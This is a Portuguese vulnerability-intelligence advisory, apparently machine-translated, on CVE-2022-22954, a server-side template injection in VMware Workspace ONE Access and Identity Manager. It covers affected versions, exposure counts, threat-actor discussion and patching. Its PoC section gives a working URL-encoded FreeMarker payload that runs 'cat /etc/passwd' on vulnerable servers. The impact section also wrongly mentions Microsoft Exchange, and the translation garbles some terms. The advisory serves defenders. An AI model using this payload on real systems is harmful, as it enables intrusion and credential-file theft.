Categoria: Inteligência de vulnerabilidadeClasse de vulnerabilidade: Injeção de modelo do lado do servidor/RCEID DA CAVERNA: CVE-2022-22954CVSS: 3.0 Pontuação: 9,8

Sumário executivo

• CloudSEKA equipe de pesquisa de ameaças ao cliente da Customer Threat analisou a execução remota de código que afeta os produtos da Vmware, que incluem o Workspace ONE Access e o Identity Manager.
• O VMware Workspace ONE Access fornece aos usuários acesso mais rápido a aplicativos SaaS, web e móveis nativos com autenticação multifator (MFA), acesso condicional e funcionalidade de login único, e o VMware Identity Manager é o componente de gerenciamento de identidade e acesso do Workspace ONE.
• A injeção de modelo do lado do servidor foi atribuída a CVE-2022-22954 com uma pontuação máxima de CVSSv3 de 9,8 e as versões afetadas do VMware incluem:
  • Dispositivo de acesso VMware Workspace ONE - 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0
  • Dispositivo VMware Identity Manager - 3.3.6, 3.3.5, 3.3.4, 3.3.3
• A VMware lançou os patches essenciais para corrigir essa vulnerabilidade.

Análise

• Em 6 de abril de 2022, a VMware lançou um consultivo abordando oito vulnerabilidades presentes em vários produtos da VMware.
• CVE-2022-22954 é uma vulnerabilidade de injeção de modelo do lado do servidor que pode levar à execução remota de código nas versões afetadas. Ele afeta o VMware Workspace ONE Access, bem como o VMware Identity Manager, e recebeu uma pontuação básica crítica no CVSSv3 de 9,8.
• Para explorar a vulnerabilidade, um invasor com acesso à rede simplesmente precisa enviar uma solicitação especialmente criada para um VMware Workspace ONE ou Identity Manager vulnerável.
• A exploração bem-sucedida da vulnerabilidade pode resultar na execução remota de código no servidor vulnerável.

Informações da OSINT

• Uma pesquisa da Shodan revelou que 711 expuseram publicamente instâncias do VMware Workspace One.
• Vários agentes de ameaças, incluindo grupos de APT, atacaram produtos da VMware no passado para realizar ataques que variam de ransomware a espionagem.

[caption id="attachment_19186" align="alignnone” width="1097"] Instâncias do VMware Workspace One acessíveis publicamente [/caption]

Informações de plataformas de crimes cibernéticos

• Vários agentes de ameaças têm discutido essa vulnerabilidade em vários fóruns de crimes cibernéticos e canais do Telegram. (Para obter mais informações, consulte o Apêndice)
• As discussões incluem as seguintes informações:
• Métodos para alavancar o impacto por meio do encadeamento de explorações.
• Shodan faz consultas para pesquisar instâncias vulneráveis na natureza.
• Prova de conceitos funcional (PoCs) por solicitação usando ferramentas de interceptação como o BurpSuite.

Como o SSTI resulta na execução remota de código?

• Uma vulnerabilidade de SSTI (injeção de modelo do lado do servidor) resulta na capacidade de executar comandos no servidor remoto. Esse vetor de ataque está muito bem documentado e afeta quase todas as principais infraestruturas de back-end e modelos relacionados, por exemplo, Freemarker/Java, Velocity/Java, Twig/PHP, Jade/Nodejs e a lista continua.
• Os ataques de injeção de modelo do lado do servidor podem ocorrer sempre que a entrada do usuário é concatenada diretamente em um modelo, em vez de ser passada como dados. Portanto, os invasores podem manipular o mecanismo de modelo injetando diretivas de modelo arbitrárias.
• Um invasor pode usar isso para executar comandos e executar cargas de shell reversas que poderiam resultar em execução remota de código. Isso torna a vulnerabilidade extremamente fácil de explorar e, ao mesmo tempo, concede controle completo do servidor.

POC (prova de conceito)

{host} /catalog-portal/ui/oauth/verify? error=&deviceUdid=% 24% 7b% 22% 66% 72% 65% 65% 6d% 61% 72% 6b% 65% 72% 2e% 74% 65% 6d% 70% 6c% 61% 74% 65% 2e% 75% 74% 69% 69% 74% 79% 2e% 45% 7 8% 65% 63% 75% 74% 65% 22% 3f%6e% 65% 77% 28% 29% 28% 22% 63% 61% 74% 20% 2f% 65% 74% 63% 2f % 70% 61% 73% 73% 77% 64% 22% 29% 7dPoC para CVE-2022-22954

• A solicitação GET acima retornará o conteúdo do arquivo /etc/passwd de um servidor vulnerável.
• A string codificada em URL fornecida como parâmetro para o argumento deviceUdid é: $ {"freemarker.template.utility.execute”? novo () (“cat /etc/passwd “)}

Impacto e mitigação

ImpactoMitigação

• Os invasores podem usar esse exploit para obter acesso não autorizado e obter maiores privilégios aos servidores Microsoft Exchange.
• Essa vulnerabilidade pode até mesmo levar a um ataque RCE (execução remota de código).
• O RCE pode levar a ataques devastadores, incluindo, mas não se limitando a, campanhas de ransomware.

• Aplique o mais recente hotfixes lançados pela VMware para a versão em uso.

Referências

• ^#https://en.wikipedia.org/wiki/Traffic_Light_Protocol
• https://www.vmware.com/security/advisories/VMSA-2022-0011.html
• https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-001
• https://blog.segu-info.com.ar/2022/04/vulnerabilidades-criticas-de-vmware.html

Apêndice

[caption id="attachment_19187" align="alignnone” width="1600"] PoC da exploração do CVE-2022-22954 [/caption] [caption id="attachment_19188" align="alignnone” width="580"] Um agente de ameaças discutindo a vulnerabilidade em um canal do Telegram [/caption] [caption id="attachment_19189" align="alignnone” width="1263"] Um agente de ameaças postando sobre a vulnerabilidade em um fórum de crimes cibernéticos [/caption]